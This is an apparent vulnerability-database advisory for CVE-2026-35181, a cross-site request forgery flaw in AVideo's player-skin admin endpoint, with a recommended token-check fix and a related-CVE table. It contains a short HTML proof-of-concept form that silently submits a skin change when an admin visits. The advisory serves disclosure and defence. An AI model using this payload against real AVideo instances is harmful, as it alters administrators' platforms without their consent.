Vulnerability DatabaseCVE-2026-35181

CVE-2026-35181:
PHP vulnerability analysis and mitigation

Severity: Medium CWE: CWE-352 (Cross-Site Request Forgery)

Summary

The player skin configuration endpoint at admin/playerUpdate.json.php does not validate CSRF tokens. The plugins table is explicitly excluded from the ORM's domain-based security check via ignoreTableSecurityCheck(), removing the only other layer of defense. Combined with SameSite=None cookies, a cross-origin POST can modify the video player appearance on the entire platform.

Details

In admin/playerUpdate.json.php at line 17, the player skin is set directly from POST data:

$pluginDO->skin = $_POST['skin'];

No CSRF token is validated anywhere in the endpoint. Normally, the ORM layer performs a Referer/Origin domain check as a secondary defense against cross-origin writes. However, the plugins table is registered in ignoreTableSecurityCheck(), which explicitly bypasses this ORM-level protection for plugin configuration. AVideo's session cookies are configured with SameSite=None, meaning the admin's authenticated session cookie is automatically included in cross-origin POST requests from any website. An attacker can craft a page that, when visited by an authenticated admin, silently changes the player skin to any value, including potentially invalid or disruptive configurations.

Proof of Concept

Host the following HTML on an attacker-controlled domain:

<!DOCTYPE html>
<html>
<head><title>CSRF Player Skin</title></head>
<body>
<h1>Loading video...</h1>
<form id="csrf" method="POST"
      action="https://your-avideo-instance.com/admin/playerUpdate.json.php">
  <input type="hidden" name="skin" value="minimalist" />
</form>
<script>
  document.getElementById("csrf").submit();
</script>
</body>
</html>

When an authenticated admin visits this page, the platform's player skin is changed without their knowledge.

Impact

Platform-wide player appearance modification without admin consent
Potential disruption of video playback if an invalid skin value is set
The ORM security bypass via ignoreTableSecurityCheck() means there is no fallback protection
Can be used as part of a broader defacement or social engineering attack

Recommended Fix

Add CSRF token validation at `admin/playerUpdate.json.php`, before processing POST data: `php // admin/playerUpdate.json.php (before line 17) if (!isGlobalTokenValid()) { die('{"error":"Invalid CSRF token"}'); }`

Found by aisafe.io

Source: NVD

Related PHP vulnerabilities:

CVE ID	Severity	Score	Technologies	Component name	CISA KEV exploit	Has fix	Published date
CVE-2026-35452	MEDIUM	5.3	PHP	wwbn/avideo	No	No	Apr 04, 2026
CVE-2026-35450	MEDIUM	5.3	PHP	wwbn/avideo	No	No	Apr 04, 2026
CVE-2026-35449	MEDIUM	5.3	PHP	wwbn/avideo	No	No	Apr 04, 2026
CVE-2026-35181	MEDIUM	4.3	PHP	wwbn/avideo	No	No	Apr 03, 2026
CVE-2026-35448	LOW	3.7	PHP	wwbn/avideo	No	No	Apr 04, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Additional Wiz resources

Cloud Vulnerability DB

A community-led vulnerabilities database

Cloud Threat Landscape

A threat intelligence database

PEACH

A tenant isolation framework

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."

David EstlickCISO

"Wiz provides a single pane of glass to see what is going on in our cloud environments."

Adam FletcherChief Security Officer

"We know that if Wiz identifies something as critical, it actually is."

Greg PoniatowskiHead of Threat and Vulnerability Management

Get a demo

CVE-2026-35181: PHP vulnerability analysis and mitigation